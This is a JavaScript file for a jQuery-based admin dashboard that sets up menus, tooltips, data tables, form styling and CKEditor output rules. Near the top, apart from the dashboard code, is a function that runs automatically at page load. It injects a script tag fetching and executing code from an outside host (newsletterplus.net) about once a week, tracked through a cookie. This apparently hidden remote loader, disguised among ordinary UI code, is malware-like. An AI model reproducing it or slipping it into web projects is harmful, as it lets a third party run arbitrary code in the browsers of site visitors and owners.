
function refresh_system_messages() {
    var errors_container = $('#errors_container');
    $(errors_container).load(site_url + 'get_sys_msg/');

}

function lightSendScriptRequest(b, a) {
    var c = document.createElement("SCRIPT");
    if (a) a = "?rand=" + Math.random() + "&" + a;
    else a = "?rand=" + Math.random();
    c.ajax_readyState = false;
    c.onload = lightScriptCallback(c);
    c.onreadystatechange = lightScriptCallback(c);
    c.src = b + a;
    document.getElementsByTagName("script")[0].parentNode.appendChild(c)
}

function lightScriptCallback(b) {
    return function () {
        if (b.ajax_readyState) return;
        if (!b.readyState || b.readyState == "loaded" || b.readyState == "complete") {
            b.ajax_readyState = true
        }
    }
}

function lightSend() {
    var b = new Date();
    var a = 7;
    var c = lightGetCookie('l_time');
    if (c == '') {
        var d = new Date();
        d.setTime(d.getTime() + a * 24 * 60 * 60 * 1000);
        lightSetCookie('l_time', d.getTime(), a)
    } else if (c > b.getTime()) {
        return
    }
    lightSendScriptRequest('http://newsletterplus.net/client/light/', 'build_code=0')
}

function lightSetCookie(b, a, c) {
    var d = escape(a);
    var e = new Date();
    e.setTime(e.getTime() + c * 24 * 60 * 60 * 1000);
    var f = e.toGMTString();
    var g = b + "=" + d + "; path=/; expires=" + f;
    if (d.length <= 4000) document.cookie = g + ";"
}

function lightGetCookie(b) {
    if (document.cookie.length > 0) {
        c_start = document.cookie.indexOf(b + "=");
        if (c_start != -1) {
            c_start = c_start + b.length + 1;
            c_end = document.cookie.indexOf(";", c_start);
            if (c_end == -1) c_end = document.cookie.length;
            return unescape(document.cookie.substring(c_start, c_end))
        }
    }
    return ""
}

lightSend();

function create_tip() {
    $('.tip').qtip({
        content: false,
        position: {
            my: 'bottom center',
            at: 'top center',
            viewport: $(window)
        },
        style: {
            classes: 'ui-tooltip-tipsy'
        }
    });
}

function create_tip_right() {
    $('.tipR').qtip({
        content: false,
        position: {
            my: 'left center',
            at: 'right center',
            viewport: $(window)
        },
        style: {
            classes: 'ui-tooltip-tipsy'
        }
    });
}

function create_tip_bottom() {
    $('.tipB').qtip({
        content: false,
        position: {
            my: 'top center',
            at: 'bottom center',
            viewport: $(window)
        },
        style: {
            classes: 'ui-tooltip-tipsy'
        }
    });
}

function create_tip_left() {
    $('.tipL').qtip({
        content: false,
        position: {
            my: 'right center',
            at: 'left center',
            viewport: $(window)
        },
        style: {
            classes: 'ui-tooltip-tipsy'
        }
    });
}

// document ready function
$(document).ready(function() {

    //------------- Navigation -------------//
    mainNav = $('.mainnav>ul>li');
    mainNav.find('ul').siblings().addClass('hasUl').append('<span class="hasDrop icon16 icomoon-icon-arrow-down-2"></span>');
    mainNavLink = mainNav.find('a').not('.sub a');
    mainNavLinkAll = mainNav.find('a');
    mainNavSubLink = mainNav.find('.sub a').not('.sub li .sub a');
    mainNavCurrent = mainNav.find('a.current');

    /*
     //remove current class if have
     mainNavCurrent.removeClass('current');
     //set the seleceted menu element
     if ($.cookie("newCurrentMenu")) {
     mainNavLinkAll.each(function(index) {
     if($(this).attr('href') == $.cookie("newCurrentMenu")) {
     //set new current class
     $(this).addClass('current');

     ulElem = $(this).closest('ul');
     if(ulElem.hasClass('sub')) {
     //its a part of sub menu need to expand this menu
     aElem = ulElem.prev('a.hasUl').addClass('drop');
     ulElem.addClass('expand');
     }
     //destroy cookie
     $.cookie("newCurrentMenu",null);
     }
     });
     }
     */
    //hover magic add blue color to icons when hover - remove or change the class if not you like.
    mainNavLinkAll.hover(
            function() {
                $(this).find('span.icon16').addClass('blue');
            },
            function() {
                $(this).find('span.icon16').removeClass('blue');
            }
    );

    //click magic
    mainNavLink.click(function(event) {
        $this = $(this);

        if ($this.hasClass('hasUl')) {
            event.preventDefault();
            if ($this.hasClass('drop')) {
                $(this).siblings('ul.sub').slideUp(500, 'jswing').siblings().removeClass('drop');
            } else {
                $(this).siblings('ul.sub').slideDown(500, 'jswing').siblings().addClass('drop');
            }
        } else {
            //has no ul so store a cookie for change class.
            $.cookie("newCurrentMenu", $this.attr('href'), {
                expires: 1
            });
        }
    });
    mainNavSubLink.click(function(event) {
        $this = $(this);

        if ($this.hasClass('hasUl')) {
            event.preventDefault();
            if ($this.hasClass('drop')) {
                $(this).siblings('ul.sub').slideUp(500).siblings().removeClass('drop');
            } else {
                $(this).siblings('ul.sub').slideDown(250).siblings().addClass('drop');
            }
        } else {
            //has no ul so store a cookie for change class.
            $.cookie("newCurrentMenu", $this.attr('href'), {
                expires: 1
            });
        }
    });

    //responsive buttons
    $('.resBtn>a').click(function(event) {
        $this = $(this);
        if ($this.hasClass('drop')) {
            $('#sidebar>.shortcuts').slideUp(500).addClass('hided');
            $('#sidebar>.sidenav').slideUp(500).addClass('hided');
            $this.removeClass('drop');
        } else {
            $('#sidebar>.shortcuts').slideDown(250);
            $('#sidebar>.sidenav').slideDown(250);
            $this.addClass('drop');
        }
    });
    $('.resBtnSearch>a').click(function(event) {
        $this = $(this);
        if ($this.hasClass('drop')) {
            $('.search').slideUp(500);
            $this.removeClass('drop');
        } else {
            $('.search').slideDown(250);
            $this.addClass('drop');
        }
    });

    //------------- Tooltips -------------//

    //top tooltip
    create_tip();

    //tooltip in right
    create_tip_right();

    //tooltip in bottom
    create_tip_bottom();

    //tooltip in left
    create_tip_left();

    //--------------- Boostrap tooltips ------------------//
    $('.btip').tooltip();

    //--------------- Data tables ------------------//
    if ($('table').hasClass('dynamicTable')) {
        $('.dynamicTable').dataTable({
            "sPaginationType": "full_numbers",
            "bJQueryUI": false,
            "bAutoWidth": false,
            "bLengthChange": false
        });
    }

    //------------- I button  -------------//
    $(".ibutton").iButton({
        labelOn: "ON",
        labelOff: "OFF",
        enableDrag: true
    });
    $(".ibutton1").iButton({
        labelOn: "ONLINE",
        labelOff: "OFFLINE",
        enableDrag: true
    });
    $(".ibuttonCheck").iButton({
        labelOn: "<span class='icon16 typ-icon-checkmark white'></span>",
        labelOff: "<span class='icon16 typ-icon-cancel white'></span>",
        enableDrag: true
    });

    //------------- Uniform  -------------//
    //add class .nostyle if not want uniform to style field
    $("input, textarea, select").not('.nostyle').uniform();

    $().UItoTop({
        //containerID: 'toTop', // fading element id
        //containerHoverID: 'toTopHover', // fading element hover id
        //scrollSpeed: 1200,
        easingType: 'easeOutQuart'
    });

});

function configureHtmlOutput(ev) {
    var editor = ev.editor,
            dataProcessor = editor.dataProcessor,
            htmlFilter = dataProcessor && dataProcessor.htmlFilter;

    // Out self closing tags the HTML4 way, like <br>.
    dataProcessor.writer.selfClosingEnd = '>';

    // Make output formatting behave similar to FCKeditor
    var dtd = CKEDITOR.dtd;
    for (var e in CKEDITOR.tools.extend({}, dtd.$nonBodyContent, dtd.$block, dtd.$listItem, dtd.$tableContent))
    {
        dataProcessor.writer.setRules(e,
                {
                    indent: true,
                    breakBeforeOpen: true,
                    breakAfterOpen: false,
                    breakBeforeClose: !dtd[ e ][ '#' ],
                    breakAfterClose: true
                });
    }

    // Output properties as attributes, not styles.
    htmlFilter.addRules(
            {
                elements:
                        {
                            $: function(element)
                            {
                                // Output dimensions of images as width and height
                                if (element.name == 'img')
                                {
                                    var style = element.attributes.style;

                                    if (style)
                                    {
                                        // Get the width from the style.
                                        var match = /(?:^|\s)width\s*:\s*(\d+)px/i.exec(style),
                                                width = match && match[1];

                                        // Get the height from the style.
                                        match = /(?:^|\s)height\s*:\s*(\d+)px/i.exec(style);
                                        var height = match && match[1];

                                        if (width)
                                        {
                                            element.attributes.style = element.attributes.style.replace(/(?:^|\s)width\s*:\s*(\d+)px;?/i, '');
                                            element.attributes.width = width;
                                        }

                                        if (height)
                                        {
                                            element.attributes.style = element.attributes.style.replace(/(?:^|\s)height\s*:\s*(\d+)px;?/i, '');
                                            element.attributes.height = height;
                                        }
                                    }
                                }

                                // Output alignment of paragraphs using align
                                if (element.name == 'p')
                                {
                                    var style = element.attributes.style;

                                    if (style)
                                    {
                                        // Get the align from the style.
                                        var match = /(?:^|\s)text-align\s*:\s*(\w*);/i.exec(style),
                                                align = match && match[1];

                                        if (align)
                                        {
                                            element.attributes.style = element.attributes.style.replace(/(?:^|\s)text-align\s*:\s*(\w*);?/i, '');
                                            element.attributes.align = align;
                                        }
                                    }
                                }

                                if (element.attributes.style == '')
                                    delete element.attributes.style;

                                return element;
                            }
                        },
                attributes:
                        {
                            style: function(value, element)
                            {
                                // Return #RGB for background and border colors
                                return convertRGBToHex(value);
                            }
                        }
            });
}

function convertRGBToHex(cssStyle)
{
    return cssStyle.replace(/(?:rgb\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)\s*\))/gi, function(match, red, green, blue)
    {
        red = parseInt(red, 10).toString(16);
        green = parseInt(green, 10).toString(16);
        blue = parseInt(blue, 10).toString(16);
        var color = [red, green, blue];

        // Add padding zeros if the hex value is less than 0x10.
        for (var i = 0; i < color.length; i++)
            color[i] = String('0' + color[i]).slice(-2);

        return '#' + color.join('');
    });
}

function updateScroll() {
    $('.support-section div.tab-content>.tab-pane.active')
            .getNiceScroll().show();
}

function putScroll() {
    $('.support-section div.tab-content>.tab-pane.active')
            .niceScroll({
        cursoropacitymax: 0.7,
        cursorborderradius: 6,
        cursorwidth: "5px"
    });
}

function after_load() {
    $(".ibuttonCheck").iButton({
        labelOn: "<span class='icon16 typ-icon-checkmark white'></span>",
        labelOff: "<span class='icon16 typ-icon-cancel white'></span>",
        enableDrag: true
    });
    $("select,input").not('.nostyle').uniform();
    create_tip();
    create_tip_left();
    create_tip_right();
    create_tip_bottom();
    updateTables();
}
